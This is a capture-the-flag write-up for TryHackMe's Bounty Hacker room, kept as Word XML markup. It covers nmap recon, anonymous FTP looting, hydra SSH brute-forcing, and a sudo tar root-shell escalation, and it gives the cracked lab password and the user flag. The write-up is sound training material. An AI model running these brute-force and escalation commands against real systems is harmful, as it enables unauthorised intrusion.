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TryHackMe – Bounty Hacker Writeup</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Room Overview</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Bounty Hacker is a beginner-friendly CTF on TryHackMe. It walks through core penetration testing skills: reconnaissance, enumeration, brute-forcing, SSH access, and privilege escalation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Step 1: Reconnaissance with Nmap</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>We start with an nmap scan to identify open ports and services.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="IntenseQuote"/>
      </w:pPr>
      <w:r>
        <w:t>nmap -sC -sV -oN bounty_scan.txt 10.10.xx.xx</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Flags explained:</w:t>
        <w:br/>
        <w:t>- -sC → run default scripts</w:t>
        <w:br/>
        <w:t>- -sV → detect service versions</w:t>
        <w:br/>
        <w:t>- -oN → save output to a file</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Findings:</w:t>
        <w:br/>
        <w:t>- Port 21 (FTP) → Anonymous login allowed</w:t>
        <w:br/>
        <w:t>- Port 22 (SSH) → OpenSSH 8.2p1</w:t>
        <w:br/>
        <w:t>- Port 80 (HTTP) → Apache 2.4.41</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Step 2: Enumerating FTP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Connected via anonymous FTP:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="IntenseQuote"/>
      </w:pPr>
      <w:r>
        <w:t>ftp 10.10.xx.xx</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Listing files:</w:t>
        <w:br/>
        <w:t>locks.txt</w:t>
        <w:br/>
        <w:t>task.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Downloaded them with:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="IntenseQuote"/>
      </w:pPr>
      <w:r>
        <w:t>get locks.txt</w:t>
        <w:br/>
        <w:t>get task.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Step 3: Loot Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>- task.txt → revealed a username: lin</w:t>
        <w:br/>
        <w:t>- locks.txt → appeared to be a password wordlist</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>This looks like creds for SSH.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Step 4: Brute Force with Hydra</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>We use Hydra to brute force SSH login for lin:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="IntenseQuote"/>
      </w:pPr>
      <w:r>
        <w:t>hydra -l lin -P locks.txt ssh://10.10.xx.xx -t 4</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Result:</w:t>
        <w:br/>
        <w:t>login: lin</w:t>
        <w:br/>
        <w:t>password: RedDr4gonSynd1cat3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Step 5: Initial Access</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Logged in with the credentials:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="IntenseQuote"/>
      </w:pPr>
      <w:r>
        <w:t>ssh lin@10.10.xx.xx</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Found the first flag:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="IntenseQuote"/>
      </w:pPr>
      <w:r>
        <w:t>cat ~/Desktop/user.txt</w:t>
        <w:br/>
        <w:t>THM{CR1M3_SyNd1C4T3}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Step 6: Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Checking sudo rights:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="IntenseQuote"/>
      </w:pPr>
      <w:r>
        <w:t>sudo -l</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Output:</w:t>
        <w:br/>
        <w:t>(root) /bin/tar</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Found a known GTFOBins privilege escalation for tar:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="IntenseQuote"/>
      </w:pPr>
      <w:r>
        <w:t>sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>This spawns a root shell.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Reading the final flag:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="IntenseQuote"/>
      </w:pPr>
      <w:r>
        <w:t>cat /root/root.txt</w:t>
        <w:br/>
        <w:t>THM{&lt;root_flag_here&gt;}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Lessons Learned</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>- Nmap recon is crucial to mapping out attack surface.</w:t>
        <w:br/>
        <w:t>- FTP misconfigurations often expose sensitive files.</w:t>
        <w:br/>
        <w:t>- Always analyze loot — user hints + password lists are common.</w:t>
        <w:br/>
        <w:t>- Hydra is a powerful tool for brute force attacks.</w:t>
        <w:br/>
        <w:t>- Privilege escalation often relies on misconfigured sudo permissions.</w:t>
        <w:br/>
        <w:t>- GTFOBins is an essential resource for escalating privileges.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>We:</w:t>
        <w:br/>
        <w:t>1. Scanned the target with Nmap</w:t>
        <w:br/>
        <w:t>2. Enumerated FTP and found useful files</w:t>
        <w:br/>
        <w:t>3. Brute-forced SSH login for user lin</w:t>
        <w:br/>
        <w:t>4. Grabbed user.txt</w:t>
        <w:br/>
        <w:t>5. Abused sudo tar to escalate privileges</w:t>
        <w:br/>
        <w:t>6. Grabbed root.txt</w:t>
        <w:br/>
        <w:br/>
        <w:t>Another box rooted! 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